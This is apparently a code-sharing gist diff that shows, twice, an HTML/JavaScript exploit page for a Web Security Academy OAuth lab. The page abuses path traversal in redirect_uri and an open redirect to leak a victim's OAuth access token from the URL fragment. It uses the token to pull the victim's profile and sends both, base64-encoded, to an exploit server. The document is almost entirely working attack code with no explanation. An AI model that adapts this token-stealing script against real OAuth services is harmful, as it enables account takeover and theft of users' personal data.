UNC1739 · February 18, 2025 00:05
diff --git a/gistfile1.txt b/gistfile1.txt
 <!DOCTYPE html>
 <html>
 <head>
    <script>
        const clientId = 'mrg1s33zswbvzan5glqj1';
        const oauthServerDomain = 'oauth-0a70007704d9237081a92ded02d500fc.oauth-server.net';
        const redirectUri = 'https://0a0e00d804a723f281952f88004b0071.web-security-academy.net';
        const exploitServerDomain = 'exploit-0a3500fe045423e4819c2ec301bb005c.exploit-server.net'; 

        // URL encoding the exploit server domain
        const encodedExploitServerDomain = encodeURIComponent(`https://${exploitServerDomain}/test`);

        // Function to extract the access_token value from the URL fragment
        function getAccessTokenFromURL() {
            const urlSearchParams = new URLSearchParams(window.location.hash.substr(1));
            return urlSearchParams.get('access_token');
        }

        // Function to get additional info
        function fetchAdditionalInfo(token) {
            return fetch(`https://${oauthServerDomain}/me`, {
                method: 'GET',
                headers: {
                    'Authorization': 'Bearer ' + token,
                    'Content-Type': 'application/json'
                }
            })
            .then(response => response.json())
            .then(data => btoa(JSON.stringify(data)))
            .catch(error => console.error('Error fetching additional info:', error));
        }

        // Function to send a request with the access token and additional info
        async function sendTokenRequest(token) {
            let info = await fetchAdditionalInfo(token);

            fetch('/test?fragment=' + btoa(token) + '&info=' + info)
                .then(response => response.json())
                .then(data => console.log(data))
                .catch(error => console.error('Error sending token request:', error));
        }

        // Event listener for when the DOM content is fully loaded
        document.addEventListener('DOMContentLoaded', function() {
            // Extract the access_token from the URL fragment
            let accessToken = getAccessTokenFromURL();

            if (accessToken) {
                // If access_token is present, send a request with the token and additional info
                sendTokenRequest(accessToken);
            } else {
                // If access_token is not present, redirect to authorization endpoint with configurable parameters
                window.location.href = `https://${oauthServerDomain}/auth?client_id=${clientId}&redirect_uri=${encodeURIComponent(redirectUri)}/oauth-callback/../post/next?path=${encodedExploitServerDomain}&response_type=token&nonce=-1826296433&scope=openid profile email`;
            }
        });
    </script>
 </head>
 <body>
 </body>
 </html>
	<!DOCTYPE html>
	<html>
	<head>
	<script>
	const clientId = 'mrg1s33zswbvzan5glqj1';
	const oauthServerDomain = 'oauth-0a70007704d9237081a92ded02d500fc.oauth-server.net';
	const redirectUri = 'https://0a0e00d804a723f281952f88004b0071.web-security-academy.net';
	const exploitServerDomain = 'exploit-0a3500fe045423e4819c2ec301bb005c.exploit-server.net';

	// URL encoding the exploit server domain
	const encodedExploitServerDomain = encodeURIComponent(`https://${exploitServerDomain}/test`);

	// Function to extract the access_token value from the URL fragment
	function getAccessTokenFromURL() {
	const urlSearchParams = new URLSearchParams(window.location.hash.substr(1));
	return urlSearchParams.get('access_token');
	}

	// Function to get additional info
	function fetchAdditionalInfo(token) {
	return fetch(`https://${oauthServerDomain}/me`, {
	method: 'GET',
	headers: {
	'Authorization': 'Bearer ' + token,
	'Content-Type': 'application/json'
	}
	})
	.then(response => response.json())
	.then(data => btoa(JSON.stringify(data)))
	.catch(error => console.error('Error fetching additional info:', error));
	}

	// Function to send a request with the access token and additional info
	async function sendTokenRequest(token) {
	let info = await fetchAdditionalInfo(token);

	fetch('/test?fragment=' + btoa(token) + '&info=' + info)
	.then(response => response.json())
	.then(data => console.log(data))
	.catch(error => console.error('Error sending token request:', error));
	}

	// Event listener for when the DOM content is fully loaded
	document.addEventListener('DOMContentLoaded', function() {
	// Extract the access_token from the URL fragment
	let accessToken = getAccessTokenFromURL();

	if (accessToken) {
	// If access_token is present, send a request with the token and additional info
	sendTokenRequest(accessToken);
	} else {
	// If access_token is not present, redirect to authorization endpoint with configurable parameters
	window.location.href = `https://${oauthServerDomain}/auth?client_id=${clientId}&redirect_uri=${encodeURIComponent(redirectUri)}/oauth-callback/../post/next?path=${encodedExploitServerDomain}&response_type=token&nonce=-1826296433&scope=openid profile email`;
	}
	});
	</script>
	</head>
	<body>
	</body>
	</html>
No results found